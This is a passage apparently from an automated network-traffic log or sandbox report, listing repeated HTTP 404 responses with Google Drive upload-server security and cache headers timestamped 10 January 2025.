https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRLN2hHNgHadDyjbHkDIejP_rc_PEBZvlpo8Zr1Nrw_4nLmhUHWWUUepfsPn57wBl9YContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:07 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-0XQU5w46C9o9sFj8tcf-MA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6YCsH2EuQyep-wImEfpcXIyghGGUnCucgEwKk7kWInKiiyHEFO2m46bAoHZkx6KMykContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:09 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-CYk39Zhs9tEnp8pXEabm4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQxFF9m1p7SgXmQmgCIoH_o0QEzvSqXbOgMJ0f3kvD8UXazqjuZwqoIWakRsu0aD0lAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:12 GMTContent-Security-Policy: script-src 'nonce--jXm5Q9HdG232UYPwLzM1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5LbuqbSvEbqSLdGWvuLGqnxUjQ2BD2TuRfWPix9tryIF6dBEE8LZCj7rQ3YFnCboWOw9JWCOIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:14 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-nwpEcFl54kIq_lOwwzg0Qw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Gr6TEF7uEmVvbqw8DUGGuffu-VDXaxs5Ue-FiRjd3fE5aMZ3iGD9kA45FIKsNiU9tgWvC0KsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:16 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-JbJgZJ1SAzmhQgKqq-3dLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTf4FXDoalZDwr04025LGVKQSPmSk6BnRYaaRJULhZDYftohSGpwBVeGGd8FeQUe1xDContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:19 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-AGraDgHtaRFvNcblfixvfw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSL1uz_VrH_36FkOgcSfjl9mZ7z2oiNphIP-6Mh5y_yueGT42ql66dK6WLcIM5bUuR078VjD24Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:21 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-S9SwmJFYe-CTa6FZOAk84g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSEUf-K29TV9HspK0iSDM7RCSRVKz_kA2P1kbpvXmXkwhwemq6I7T49-nmDdVhGUd_DContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:23 GMTContent-Security-Policy: script-src 'nonce-Ym_zG50vr_fB-inpM67hIQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4BY1nMj23zxUvINk7iCRVYfwnM7SJyS59HLu01AxQcbEt_t1PMsBTa1puGL-7HJd-jContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:25 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-XNh2jNlbj1Z485zPG3wAcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTBBergi_s54k7dUz975d3ixzRUK8TNFx8aKzjtZ2sRaKib5nquoehgflUCUTfplAuoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:28 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Dmo84NXbWAtznyBEhBK7TQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6jyjbFgl1gbFUK4iRhij7444whM1hxRBhLWIo4H4OpzRGSuyM374RKBzIlJfs8wkx9Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:30 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-zHYg6pJBMH4ucdlT9rCToA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4SLsGYiHjPz9MQVJJkoc26BLu4oYhKQquwdqkDK-wlscsZvDAuJdgoNE6H7ErPhPRuuXwXY64Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:32 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-laBNzsWtaoWMY9rnk9sxWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTanNM34eTwf832VRdI7g2hcBWVzS6Mxm5pK_tkR-eCaa9_Di4DLVsJ4OLf-s2mjb-7Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:35 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-90iwcmhoHxf74y5pcud6Cw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQhJzHgozB75gam0sM-sATueUkc-xiOce4FQxkww4vUwqrhlTNm0doDgK0_ngwFrbntContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:37 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-7UH3_v7O71nzk3AW6Gnnxg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7Mvo9V69fHwQK2FW1Nm7173K1I8fBZLfKNAM4NzSb8bqdw8B1fab-0IM6WI9Gnr8kDContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:39 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-v6NbmKre5m67uHZkn0vfWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, 